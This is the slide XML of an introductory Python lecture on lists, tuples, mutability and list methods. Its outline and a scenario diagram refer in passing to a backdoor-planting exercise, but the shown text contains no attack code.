              <a:rPr lang="en-US" altLang="en-US" sz="20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* 3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dirty="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en-US" sz="2000" b="0" dirty="0" err="1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HelloHelloHello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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’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9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Motivating game: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Planting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backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mutability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Function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Exceptions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Hands-on lab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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Snake Green Gard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220" y="4031933"/>
            <a:ext cx="1047115" cy="209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Lists are mutable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78280"/>
            <a:ext cx="7924800" cy="5074920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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sz="3200" b="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32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li = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="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en-US" sz="3200" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="32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, 23, 4.34, 23]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3200" b="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32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li[1] = 45 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="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32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li</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="32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3200" b="0" dirty="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[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="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’, 45, 4.34, 23]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/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en-US" sz="1100" b="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>We can change lists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>in place.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0"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en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" i="1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li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> still points to the same memory reference when we’re done. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0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615320" y="1167480"/>
              <a:ext cx="5820120" cy="2536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2440" y="1164960"/>
                <a:ext cx="5825880" cy="254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187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Tuples are immutable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48600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="179388" indent="-179388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t = (23, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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en-US" sz="2000" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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, 4.56, (2,3), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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en-US" sz="2000" b="0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2000" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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  <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0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179388" indent="-179388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t[2] = 3.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388"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1000" b="0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179388" indent="-179388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1800" b="0" dirty="0" err="1" smtClean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Traceback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="0" dirty="0" smtClean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(most recent call last):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388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1800" b="0" dirty="0" smtClean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File "&lt;pyshell#75&gt;", line 1, in -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="0" dirty="0" err="1" smtClean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toplevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="0" dirty="0" smtClean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-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388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1800" b="0" dirty="0" smtClean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1800" b="0" dirty="0" err="1" smtClean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tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="0" dirty="0" smtClean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[2] = 3.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388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1800" b="0" dirty="0" err="1" smtClean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TypeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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: object doesn't support item assignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388"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1000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF33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179388" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>You can’t change a tuple. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>You can make a fresh tuple and assign its reference to a previously used name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="179388" indent="-179388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&gt;&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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t = (23, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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en-US" sz="2000" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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, 3.14, (2,3), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0" smtClean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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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20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Operations on Lists Only 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39240"/>
            <a:ext cx="7924800" cy="454152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en-US" b="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li = [1, 11, 3, 4, 5]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" b="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b="0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li.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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(‘a’)	# Note the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" i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method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" b="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li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" b="0" dirty="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[1, 11, 3, 4, 5, ‘a’]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" b="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b="0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li.insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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(2, ‘i’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" b="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li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" b="0" dirty="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[1, 11, ‘i’, 3, 4, 5, ‘a’]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383120" y="1310760"/>
              <a:ext cx="706680" cy="3430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6640" y="1307520"/>
                <a:ext cx="716040" cy="35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195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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1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extend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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method vs  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" i="1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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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 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36538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> creates a fresh list with a new memory ref</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>extend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> operates on list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> in place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0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857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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2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li.extend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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([9, 8, 7])           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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[1, 2, ‘i’, 3, 4, 5, ‘a’, 9, 8, 7]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0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236538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Potentially confusing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>extend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takes a list as an argument. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>append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takes a singleton as an argument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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400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li.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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([10, 11, 12])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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 li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="24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[1, 2, ‘i’, 3, 4, 5, ‘a’, 9, 8, 7, [10, 11, 12]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="236538" indent="-236538">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="6224588" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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814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Operations on Lists Only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7320"/>
            <a:ext cx="8153400" cy="507492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en-US" sz="2800" b="0" dirty="0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t>Lists have many methods, including index, count, remove, reverse, sort </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="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li = [‘a’, ‘b’, ‘c’, ‘b’]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="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b="0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li.index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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(‘b’)  # index of 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" baseline="300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st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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occurrence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" baseline="30000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en-US" b="0" dirty="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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="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b="0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li.count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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(‘b’)  # number of occurrences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="0" dirty="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  <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" b="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b="0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li.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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(‘b’) # remove 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" baseline="300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st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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occurrence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="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li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="0" dirty="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[‘a’, ‘c’, ‘b’]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" baseline="30000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90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Scenario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14" name="Content Placeholder 13" descr="Server diagram icon vector image | Free SV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36" y="2164001"/>
            <a:ext cx="2907824" cy="2907824"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 4" descr="La Deep Web o la Internet profunda, la zona oculta e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1185412" y="2855285"/>
            <a:ext cx="2427518" cy="1525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861652" y="2436379"/>
            <a:ext cx="1075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Hacker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333476" y="3804053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Kali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7400" y="1828221"/>
            <a:ext cx="1718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Chat Server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808932" y="2923517"/>
            <a:ext cx="2032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Windows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8" name="Picture 17" descr="Inchworm vector image | Free SV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24577" y="3302973"/>
            <a:ext cx="831174" cy="831174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3612929" y="3429000"/>
            <a:ext cx="2254471" cy="579120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2225040"/>
              <a:gd name="connsiteY0" fmla="*/ 152400 h 579120"/>
              <a:gd name="connsiteX1" fmla="*/ 335280 w 2225040"/>
              <a:gd name="connsiteY1" fmla="*/ 137160 h 579120"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 2225040"/>
              <a:gd name="connsiteY2" fmla="*/ 167640 h 579120"/>
              <a:gd name="connsiteX3" fmla="*/ 426720 w 2225040"/>
              <a:gd name="connsiteY3" fmla="*/ 182880 h 579120"/>
              <a:gd name="connsiteX4" fmla="*/ 518160 w 2225040"/>
              <a:gd name="connsiteY4" fmla="*/ 243840 h 579120"/>
              <a:gd name="connsiteX5" fmla="*/ 563880 w 2225040"/>
              <a:gd name="connsiteY5" fmla="*/ 274320 h 579120"/>
              <a:gd name="connsiteX6" fmla="*/ 640080 w 2225040"/>
              <a:gd name="connsiteY6" fmla="*/ 335280 h 579120"/>
              <a:gd name="connsiteX7" fmla="*/ 670560 w 2225040"/>
              <a:gd name="connsiteY7" fmla="*/ 381000 h 579120"/>
              <a:gd name="connsiteX8" fmla="*/ 762000 w 2225040"/>
              <a:gd name="connsiteY8" fmla="*/ 441960 h 579120"/>
              <a:gd name="connsiteX9" fmla="*/ 883920 w 2225040"/>
              <a:gd name="connsiteY9" fmla="*/ 518160 h 579120"/>
              <a:gd name="connsiteX10" fmla="*/ 929640 w 2225040"/>
              <a:gd name="connsiteY10" fmla="*/ 548640 h 579120"/>
              <a:gd name="connsiteX11" fmla="*/ 1112520 w 2225040"/>
              <a:gd name="connsiteY11" fmla="*/ 579120 h 579120"/>
              <a:gd name="connsiteX12" fmla="*/ 1356360 w 2225040"/>
              <a:gd name="connsiteY12" fmla="*/ 563880 h 579120"/>
              <a:gd name="connsiteX13" fmla="*/ 1447800 w 2225040"/>
              <a:gd name="connsiteY13" fmla="*/ 518160 h 579120"/>
              <a:gd name="connsiteX14" fmla="*/ 1493520 w 2225040"/>
              <a:gd name="connsiteY14" fmla="*/ 502920 h 579120"/>
              <a:gd name="connsiteX15" fmla="*/ 1600200 w 2225040"/>
              <a:gd name="connsiteY15" fmla="*/ 381000 h 579120"/>
              <a:gd name="connsiteX16" fmla="*/ 1722120 w 2225040"/>
              <a:gd name="connsiteY16" fmla="*/ 198120 h 579120"/>
              <a:gd name="connsiteX17" fmla="*/ 1752600 w 2225040"/>
              <a:gd name="connsiteY17" fmla="*/ 152400 h 579120"/>
              <a:gd name="connsiteX18" fmla="*/ 1798320 w 2225040"/>
              <a:gd name="connsiteY18" fmla="*/ 121920 h 579120"/>
              <a:gd name="connsiteX19" fmla="*/ 1920240 w 2225040"/>
              <a:gd name="connsiteY19" fmla="*/ 45720 h 579120"/>
              <a:gd name="connsiteX20" fmla="*/ 2011680 w 2225040"/>
              <a:gd name="connsiteY20" fmla="*/ 15240 h 579120"/>
              <a:gd name="connsiteX21" fmla="*/ 2057400 w 2225040"/>
              <a:gd name="connsiteY21" fmla="*/ 0 h 579120"/>
              <a:gd name="connsiteX22" fmla="*/ 2225040 w 2225040"/>
              <a:gd name="connsiteY22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225040" h="579120">
                <a:moveTo>
                  <a:pt x="0" y="152400"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="212383" y="109923"/>
                  <a:pt x="100773" y="117618"/>
                  <a:pt x="335280" y="137160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="350520" y="147320"/>
                  <a:pt x="364617" y="159449"/>
                  <a:pt x="381000" y="167640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="395368" y="174824"/>
                  <a:pt x="412677" y="175078"/>
                  <a:pt x="426720" y="182880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="458742" y="200670"/>
                  <a:pt x="487680" y="223520"/>
                  <a:pt x="518160" y="243840"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="563880" y="274320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="651231" y="405347"/>
                  <a:pt x="534920" y="251152"/>
                  <a:pt x="640080" y="335280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="654383" y="346722"/>
                  <a:pt x="656776" y="368939"/>
                  <a:pt x="670560" y="381000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="698129" y="405123"/>
                  <a:pt x="762000" y="441960"/>
                  <a:pt x="762000" y="441960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="835116" y="551634"/>
                  <a:pt x="731577" y="416598"/>
                  <a:pt x="883920" y="518160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="899160" y="528320"/>
                  <a:pt x="912805" y="541425"/>
                  <a:pt x="929640" y="548640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="971102" y="566409"/>
                  <a:pt x="1085637" y="575760"/>
                  <a:pt x="1112520" y="579120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1193800" y="574040"/>
                  <a:pt x="1275369" y="572405"/>
                  <a:pt x="1356360" y="563880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1404881" y="558773"/>
                  <a:pt x="1405332" y="539394"/>
                  <a:pt x="1447800" y="518160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1462168" y="510976"/>
                  <a:pt x="1478280" y="508000"/>
                  <a:pt x="1493520" y="502920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1564640" y="396240"/>
                  <a:pt x="1524000" y="431800"/>
                  <a:pt x="1600200" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1722120" y="198120"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1732280" y="182880"/>
                  <a:pt x="1737360" y="162560"/>
                  <a:pt x="1752600" y="152400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1798320" y="121920"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1846622" y="49467"/>
                  <a:pt x="1811424" y="81992"/>
                  <a:pt x="1920240" y="45720"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2011680" y="15240"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2026920" y="10160"/>
                  <a:pt x="2041336" y="0"/>
                  <a:pt x="2057400" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2225040" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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6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Operations on Lists Only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li = [5, 2, 6, 8]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 b="0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b="0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li.reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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()    # reverse the list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" i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*in place*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li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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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[8, 6, 2, 5]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 b="0" dirty="0" smtClean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b="0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li.sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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()       # sort the list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" i="1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*in place*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li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 </a:t>
            </a:r>
            <a:r>
